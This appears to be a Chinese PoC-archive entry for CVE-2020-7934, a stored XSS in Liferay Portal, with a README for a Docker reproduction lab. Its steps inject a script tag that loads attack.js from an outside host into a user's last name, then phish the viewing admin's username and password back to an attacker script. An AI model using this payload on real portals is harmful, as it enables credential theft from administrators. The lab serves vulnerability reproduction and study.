POC详情: 1cfa435d961d57c2de352309ebc211a13200b2a8

来源
关联漏洞
标题: Liferay Portal 跨站脚本漏洞 (CVE-2020-7934)
描述:Liferay Portal是美国Liferay公司的一套基于J2EE的门户解决方案。该方案使用了EJB以及JMS等技术,并可作为Web发布和共享工作区、企业协作平台、社交网络等。 LifeRay Portal CE v7.1.0版本至v7.2.1版本中的MyAccountPortlet的First Name、Middle Name和Last Name字段存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
介绍
# CVE 2020-7934

## How to run CVE

### Requirements
1) docker
### Remarks
it's possible put the script attack online (given the js code ) http://yourjavascript.com/
Our Js script online for the attack
```html <script src="http://yourjavascript.com/920172199111/attack.js"></script> ```

### Commands for configuration
1) go to root folder of this project
2) run "sudo docker-compose up --build"
4) new terminal: run "docker inspect liferay"  ==> and copy the IPAddress value
5) new terminal: run "python api_attacker.py" 
5) open a browser and go to "http://IPAddress:8080" ==> you should get the liferay portal as response
6) to stop and delete containers use "sudo docker-compose rm"
### Istructions for the attack
1) Register in liferay as a user, log in, and in the "available sites" section, join the "liferay" site.
2) Change the "last name" in a JS script (directly (<script>alert("xss")</script>) or through a "src =" http ... "")
2) Log in as admin liferay (username: test@liferay.com, password: test)
3) Go to available sites and click on "liferay", the public page of this site will open.
4) Go to the new page, a menu will open on the right, click on mermbership.
5) Select the user registered in step 1. At that moment the script will be executed.
5.1) In the script attack.js the page will ask the credentials.
6) In the terminal of step 5 ( of Commands for configuration) it will be printed username/password inserted in 5.1 ( by admin ) )
文件快照

[4.0K] /data/pocs/1cfa435d961d57c2de352309ebc211a13200b2a8 ├── [ 573] api_attacker.py ├── [ 789] attack.js ├── [ 646] Details.txt ├── [ 138] docker-compose.yml ├── [1.4K] README.md └── [ 182] simple_injection.js 0 directories, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。